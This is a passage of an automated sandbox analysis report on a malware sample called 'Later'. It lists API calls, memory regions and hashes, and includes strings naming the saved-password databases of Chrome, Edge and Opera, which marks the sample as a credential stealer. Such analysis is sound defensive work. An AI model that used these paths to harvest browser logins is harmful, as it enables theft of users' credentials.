                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: fbe5df9f41cf4526f57587c0b673bfcb70e6f80bc3b216fb2b3b2ce469195585
                                        • Instruction ID: af83afb3ab6c060297671d7f5f25fae20416c58415490ebb0469b2214a7b59de
                                        • Opcode Fuzzy Hash: fbe5df9f41cf4526f57587c0b673bfcb70e6f80bc3b216fb2b3b2ce469195585
                                        • Instruction Fuzzy Hash: 0E2103353012109FEB15AF60EC49B2E77A8FF45721F118019F9069B2A2DB70ED05CB99
                                        APIs
                                          • Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
                                          • Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93
                                        • GetACP.KERNEL32(?,?,?,?,?,?,014EA7CC,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 014F4E68
                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,014EA7CC,?,?,?,00000055,?,-00000050,?,?), ref: 014F4E9F
                                        • _wcschr.LIBVCRUNTIME ref: 014F4F33
                                        • _wcschr.LIBVCRUNTIME ref: 014F4F41
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 014F5002
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                        • String ID: utf8
                                        • API String ID: 4147378913-905460609
                                        • Opcode ID: a9cc1393d1c8f005b5f321a6b076329583d210dbfbe10df104bba9a2231008be
                                        • Instruction ID: 6ae2c2616b35f223175fe260672297520e910a773dc2dff89171f4bbb8c5f1f9
                                        • Opcode Fuzzy Hash: a9cc1393d1c8f005b5f321a6b076329583d210dbfbe10df104bba9a2231008be
                                        • Instruction Fuzzy Hash: B371E671A04203AAEB25AF79CC55A7777A8EF24710F08442FE719DB3A0EF74E44187A1
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,014F5854,00000002,00000000,?,?,?,014F5854,?,00000000), ref: 014F55DB
                                        • GetLocaleInfoW.KERNEL32(?,20001004,014F5854,00000002,00000000,?,?,?,014F5854,?,00000000), ref: 014F5604
                                        • GetACP.KERNEL32(?,?,014F5854,?,00000000), ref: 014F5619
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: b94977d5ef5e26b025ceea43b42dc59b7704fd5c096fe810675cf7e11c622566
                                        • Instruction ID: 9cf879c22fa96dd32e94cc4f96dc73981d881c847cc3ff9f5c88d33dd4019304
                                        • Opcode Fuzzy Hash: b94977d5ef5e26b025ceea43b42dc59b7704fd5c096fe810675cf7e11c622566
                                        • Instruction Fuzzy Hash: E421A731600101ABEB369F6DD908A97B7E7BB44E54B46446EE71ECF329E731D941C390
                                        APIs
                                          • Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
                                          • Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93
                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 014F5826
                                        • IsValidCodePage.KERNEL32(00000000), ref: 014F5864
                                        • IsValidLocale.KERNEL32(?,00000001), ref: 014F5877
                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 014F58BF
                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 014F58DA
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                        • String ID:
                                        • API String ID: 415426439-0
                                        • Opcode ID: 5063aa6b2c12f41386cfd956d2b3eb71cc1eef4e955260e56abbcff20bfa0e33
                                        • Instruction ID: 1924a4839d42eb120beb8dd4599320497f5158157e5e857e09e3c6722df79512
                                        • Opcode Fuzzy Hash: 5063aa6b2c12f41386cfd956d2b3eb71cc1eef4e955260e56abbcff20bfa0e33
                                        • Instruction Fuzzy Hash: 40514071A01216AEEB21DFA9CC44AAB77F8FF18700F05446EA711EF360E7709544CBA1
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C5C196
                                        • _wcscmp.LIBCMT ref: 00C5C1C6
                                        • _wcscmp.LIBCMT ref: 00C5C1DB
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C5C1EC
                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C5C21C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                        • String ID:
                                        • API String ID: 2387731787-0
                                        • Opcode ID: 603a26767a99b4bbbaad715a617ed4b020451f2995190461017db297b7da74fb
                                        • Instruction ID: 0d6bede96fa988e97a6fb31a2a703c92cad700f60cbb0a029d46bd4d64032803
                                        • Opcode Fuzzy Hash: 603a26767a99b4bbbaad715a617ed4b020451f2995190461017db297b7da74fb
                                        • Instruction Fuzzy Hash: 8251BC396047028FD714DFA8D8C0AAAB3E4FF4A324F10465DF966873A1DB30AD48CB95
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0dfc7e667b38ebe1e3c454dd6cc6b6134ae81f308a9512fda05ed4d65119c9fa
                                        • Instruction ID: 1d8d99256842aa95ac2d5e8ed1275c4d58e2f06d77aa283583eddbca3b855685
                                        • Opcode Fuzzy Hash: 0dfc7e667b38ebe1e3c454dd6cc6b6134ae81f308a9512fda05ed4d65119c9fa
                                        • Instruction Fuzzy Hash: 2D025C71E002199BDF14CFA9C984AAEFBF1FF48715F24826AD519E7391D731AA01CB90
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 014D95B8
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 014D9683
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 014D96A3
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 014D96AD
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: 8dfcd2d23a2cf9848bd8d9d1a09b3708e5a7b938ee96be23cf34f0210e6c5cbe
                                        • Instruction ID: 2475fe7e2e890a4091a9d3896e716d29df5d40ac983a4516574410a9f1d6b399
                                        • Opcode Fuzzy Hash: 8dfcd2d23a2cf9848bd8d9d1a09b3708e5a7b938ee96be23cf34f0210e6c5cbe
                                        • Instruction Fuzzy Hash: 94312975D0121D9BDF21DFA5D999BCDBBF8BF18304F1040AAE50CAB250EB719A858F44
                                        Strings
                                        • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 014012F1
                                        • \Opera Software\Opera GX Stable\Login Data, xrefs: 01401291
                                        • \Opera Software\Opera Stable\Login Data, xrefs: 014012C1
                                        • \Google\Chrome\User Data\Default\Login Data, xrefs: 01401274
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \Google\Chrome\User Data\Default\Login Data$\Microsoft\Edge\User Data\Default\Login Data$\Opera Software\Opera GX Stable\Login Data$\Opera Software\Opera Stable\Login Data
                                        • API String ID: 0-1927145488
                                        • Opcode ID: f424113337b6f99752932ac431c0ef52a2f41df1a0851ee281da75131033ec52
                                        • Instruction ID: 232d0dd30917e24300985ab505ff971a73df22a9b7c3634053a6160220dbd810
                                        • Opcode Fuzzy Hash: f424113337b6f99752932ac431c0ef52a2f41df1a0851ee281da75131033ec52
                                        • Instruction Fuzzy Hash: AB11E072684284ABE331DFC1E819B163BE1F732B14F16024DD2251F3C4C7BA180C9B81
                                        APIs
                                          • Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
                                          • Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 014F521A
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 014F5264
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 014F532A
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale$ErrorLast
                                        • String ID:
                                        • API String ID: 661929714-0
                                        • Opcode ID: 5363dfa8d1c3eda46ff61f59a24ce87137008ac01cf62b8582797199a4dd35dc
                                        • Instruction ID: 8c88554e03b4de9379dc669492f0681a389088f450611345313e9c259efff231
                                        • Opcode Fuzzy Hash: 5363dfa8d1c3eda46ff61f59a24ce87137008ac01cf62b8582797199a4dd35dc
                                        • Instruction Fuzzy Hash: 08619F75A002079BEB299F2DD881B6A77E8EF14300F10417EEA15CA7A5EB74E941CF50
                                        APIs
                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C61CBA,00000000), ref: 00C62891
                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00C61CBA,00000000), ref: 00C628C8
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Internet$AvailableDataFileQueryRead
                                        • String ID:
                                        • API String ID: 599397726-0
                                        • Opcode ID: 417ced1aed8dfea870ee56d9f314b2762be5b2851f7851a4fedf51557246832a
                                        • Instruction ID: 2525d6205e42782bb6d4f7b6cd1c39a35806d438fe21dfe092ca45ed9424a20c
                                        • Opcode Fuzzy Hash: 417ced1aed8dfea870ee56d9f314b2762be5b2851f7851a4fedf51557246832a
                                        • Instruction Fuzzy Hash: 0B41B472904A09BFEB30DA95CCC5FBF77BCEB44724F10406EFA11A7181DA719E41AA64
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 014E4ECC
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 014E4ED6
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 014E4EE3
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: dd1c243096022ac29a643b953edf589e54b6e1e7383cf85ea5b3c76f8ad71569
                                        • Instruction ID: a58f2a21dd06719ee17955b84e7a7a6f4cfd1315642528d8b85fcdb3e69e70c6
                                        • Opcode Fuzzy Hash: dd1c243096022ac29a643b953edf589e54b6e1e7383cf85ea5b3c76f8ad71569
                                        • Instruction Fuzzy Hash: C631C27490122DABCB61DF69D888B8DBBF8BF58311F5041EAE51CA6260E7709B858F44
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C540DE
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C5411F
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C5412A
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 9966963ef35410867fd55ddf6137dffc89bb852aed06754d844e445b2fe67df3
                                        • Instruction ID: b7331f0a3336a2466985164d0f007de71826c1b55f3753419b0f954d0f3965b2
                                        • Opcode Fuzzy Hash: 9966963ef35410867fd55ddf6137dffc89bb852aed06754d844e445b2fe67df3
                                        • Instruction Fuzzy Hash: A2118275E01228BFDB508F959C44FAFBFBCEB45B60F104155FD14E7290C6704A448BA5
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00C6991A,?,00C8098C,?), ref: 00C5A547
                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00C6991A,?,00C8098C,?), ref: 00C5A559
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: e838f6141de14ca40c493c51f96c3bf856a9620d2669e22e259d4ca82d2a0748
                                        • Instruction ID: 439f4c4fcb661425355c2931d01ddcb4baba839644615b09458bc48f9ad179b8
                                        • Opcode Fuzzy Hash: e838f6141de14ca40c493c51f96c3bf856a9620d2669e22e259d4ca82d2a0748
                                        • Instruction Fuzzy Hash: 39F0E23510422DBBDB20AFA4DC48FEA77ACFF08361F008255B908D2181E6309A44DBA1
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C48D0A), ref: 00C48BE1
                                        • CloseHandle.KERNEL32(?,?,00C48D0A), ref: 00C48BF3
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: 3ccd0f36f78e678ca18ad12b58271b6c4bfb1f43501ec9cf6519166b3c0fde7f
                                        • Instruction ID: ae8ee20a6b5bd32369d1707aa9cc293852770f14aba8bec470d48f23b2024d68
                                        • Opcode Fuzzy Hash: 3ccd0f36f78e678ca18ad12b58271b6c4bfb1f43501ec9cf6519166b3c0fde7f
                                        • Instruction Fuzzy Hash: 3AE08671004600AFE7612B50EC05FB77BA9FF00311B30851EF55581430CB715CD1EB50
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C18EB7,?,?,?,00000001), ref: 00C1A2BA
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C1A2C3
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 461ce4a9601b5eddd150e812af05f122b6d2fb01f30cf7bc7b5a3457478d6a51
                                        • Instruction ID: 5527b35fe4406a73cda90328eed4f5952554c254489a51de9cc18ce42854b5d8
                                        • Opcode Fuzzy Hash: 461ce4a9601b5eddd150e812af05f122b6d2fb01f30cf7bc7b5a3457478d6a51
                                        • Instruction Fuzzy Hash: 7AB09231064708ABCA802B91EC09B8C3F68EB46A62F104010F60D44070CB6264548B99
                                        APIs
                                          • Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
                                          • Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 014F546D
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$InfoLocale
                                        • String ID:
                                        • API String ID: 3736152602-0
                                        • Opcode ID: dfd6e5d62fe2ce02afdf66f7d02dca23b2e4be2934edb3a4e4a8652f1f76b19b
                                        • Instruction ID: 296774cd83034426206be3c7ffe9326cafef5c5a528ee9f5b577fe6f6db8f377
                                        • Opcode Fuzzy Hash: dfd6e5d62fe2ce02afdf66f7d02dca23b2e4be2934edb3a4e4a8652f1f76b19b
                                        • Instruction Fuzzy Hash: 9D219272701206ABEF289A2ADC45B7B77A8EF55312F10407FEE05DA360EB74E944C750
                                        APIs
                                          • Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
                                          • Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93
                                        • EnumSystemLocalesW.KERNEL32(014F51C6,00000001,00000000,?,-00000050,?,014F57FA,00000000,?,?,?,00000055,?), ref: 014F5112
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2417226690-0
                                        • Opcode ID: 9f4d5dbf1cb1e7c34fb4b51dbc3b586cb1fb0efd27019575f93b420217248f0f
                                        • Instruction ID: 471939fc53be0b5413b46e9303469d4027daae729916471788d7458379a7c182
                                        • Opcode Fuzzy Hash: 9f4d5dbf1cb1e7c34fb4b51dbc3b586cb1fb0efd27019575f93b420217248f0f
                                        • Instruction Fuzzy Hash: EA11083B6007019FDB189F3DC9A15BAB7A2FF80369B15482EDA878BB50E771B542C740
                                        APIs
                                          • Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
                                          • Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93
                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,014F53E2,00000000,00000000,?), ref: 014F5674
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$InfoLocale
                                        • String ID:
                                        • API String ID: 3736152602-0
                                        • Opcode ID: 779b63d86bbd8cd1bba5ec99dccb84e834993a6c8bbdc0828a59be81a2a57fd3
                                        • Instruction ID: 3b567016954bf0bbe3c08cbe10214f6efecff1ccfdc73831ae95402d72b6ad89
                                        • Opcode Fuzzy Hash: 779b63d86bbd8cd1bba5ec99dccb84e834993a6c8bbdc0828a59be81a2a57fd3
                                        • Instruction Fuzzy Hash: 7C01FE32600112BFFB2856299C156BB7754EB40254F05443EDF1EAB390DA74FD41C690
                                        APIs
                                          • Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
                                          • Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93
                                        • EnumSystemLocalesW.KERNEL32(014F5419,00000001,00000000,?,-00000050,?,014F57C2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 014F5185
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2417226690-0
                                        • Opcode ID: 95ce72bdf2b188599afdeaa59e2472f9cb82e26e290d5017f036e9a3f7fe692f
                                        • Instruction ID: 3a1656c2fbdf3a4d711d5f15c0052adae88e2fff9533449c56bf2a634fad74a7
                                        • Opcode Fuzzy Hash: 95ce72bdf2b188599afdeaa59e2472f9cb82e26e290d5017f036e9a3f7fe692f
                                        • Instruction Fuzzy Hash: AEF0F6367003055FDB256F7A9C80A7ABB91FF80368F15442EEB058F760D671A841C710
                                        APIs
                                          • Part of subcall function 014E598B: EnterCriticalSection.KERNEL32(?,?,014E8E0C,00000000,015258B0,0000000C,014E8DD4,?,?,014EC20B,?,?,014EC08B,00000001,00000364,?), ref: 014E599A
                                        • EnumSystemLocalesW.KERNEL32(014EC26F,00000001,01525AB8,0000000C,014EC6E4,00000000), ref: 014EC2B4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                        • String ID:
                                        • API String ID: 1272433827-0
                                        • Opcode ID: 0c817cd783e82b978f669f6dcf072a8ba5178a9860dfe3dee49d5280a14bb5c8
                                        • Instruction ID: d036886099a4cdf2f5d9aa243376f85699adada0606c81d1e174ab591867f655
                                        • Opcode Fuzzy Hash: 0c817cd783e82b978f669f6dcf072a8ba5178a9860dfe3dee49d5280a14bb5c8
                                        • Instruction Fuzzy Hash: 2AF04932A00202DFDB20EF99E545B9DB7F0EB69726F10811AE520EB2A0C7B55904DF80
                                        APIs
                                          • Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
                                          • Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93
                                        • EnumSystemLocalesW.KERNEL32(014F4FAE,00000001,00000000,?,?,014F581C,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 014F508C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2417226690-0
                                        • Opcode ID: 925dac118e8909a44153c6949165c584659becb63e0e4485281a20e35b55b2c9
                                        • Instruction ID: 48c8e91779e725088ff6195a35a2f68efabbbe9d19d61b41090ede0d5013c2fe
